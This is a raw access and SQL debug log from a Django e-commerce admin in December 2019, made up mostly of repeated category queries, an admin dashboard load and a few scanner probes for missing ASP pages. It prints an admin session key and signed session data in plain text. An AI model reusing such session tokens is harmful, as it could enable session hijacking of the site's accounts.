/robots.txt [19/Dec/2019 01:56:01] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [19/Dec/2019 01:56:02] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=181 HTTP/1.0" 404 6532 Not Found: /newslist.asp [19/Dec/2019 01:56:04] "GET /newslist.asp?type=4&id=1331 HTTP/1.0" 404 6476 [19/Dec/2019 01:58:24] "GET / HTTP/1.0" 302 0 [19/Dec/2019 02:03:46] "GET / HTTP/1.0" 302 0 [19/Dec/2019 02:10:04] "GET / HTTP/1.0" 302 0 [19/Dec/2019 02:12:58] "GET / HTTP/1.0" 302 0 [19/Dec/2019 02:15:43] "GET / HTTP/1.0" 302 0 [19/Dec/2019 02:20:46] "GET / HTTP/1.0" 302 0 [19/Dec/2019 02:27:57] "GET / HTTP/1.0" 302 0 [19/Dec/2019 06:26:25] "GET /admin HTTP/1.0" 301 0 DEBUG 2019-12-19 06:26:26,209 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 06:26:26,216 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 06:26:26,220 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 06:26:26,222 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 06:26:26,226 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 06:26:26,228 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 06:26:26,230 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 06:26:26,232 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 06:26:26,235 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 06:26:26,238 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 06:26:26,240 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 06:26:26,242 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 06:26:26,244 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 06:26:26,247 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 06:26:26,250 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 06:26:26,252 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 06:26:26,254 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 06:26:26,256 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 06:26:26,259 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 06:26:26,262 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 06:26:26,264 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 06:26:26,267 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 06:26:26,269 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 06:26:26,271 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 06:26:26,276 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 06:26:26,280 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 06:26:26,283 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 06:26:26,285 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 06:26:26,287 utils 4252 140031503103744 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-19T06:26:26.275475+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 19, 6, 26, 26, 275475, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-19 06:26:26,288 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 06:26:26,290 utils 4252 140031503103744 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-19 06:26:26,295 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 06:26:26,299 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 06:26:26,307 utils 4252 140031492613888 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 06:26:26,311 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 06:26:26,319 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 06:26:26,331 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 06:26:26,334 utils 4252 140031503103744 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-19 06:26:26,339 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 06:26:26,343 utils 4252 140031503103744 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-02T06:26:26.341069+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 2, 6, 26, 26, 341069, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-19 06:26:26,344 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 06:26:26,346 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) [19/Dec/2019 06:26:26] "GET /admin/ HTTP/1.0" 200 8208 DEBUG 2019-12-19 06:26:26,348 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 06:26:26,351 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 06:26:26,353 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 06:26:26,356 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 06:26:26,358 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 06:26:26,360 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 06:26:26,363 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 06:26:26,365 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 06:26:26] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 06:26:26] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [19/Dec/2019 06:26:26] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [19/Dec/2019 06:26:28] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [19/Dec/2019 06:26:28] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 06:26:28] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [19/Dec/2019 06:26:29] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 06:26:30] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [19/Dec/2019 06:26:30] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [19/Dec/2019 06:26:30] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [19/Dec/2019 06:26:30] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [19/Dec/2019 06:26:31] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 DEBUG 2019-12-19 06:32:54,616 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 06:32:54,623 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 06:32:54,627 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 06:32:54,629 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 06:32:54,633 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 06:32:54,635 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 06:32:54,637 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 06:32:54,640 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 06:32:54,642 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 06:32:54,646 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 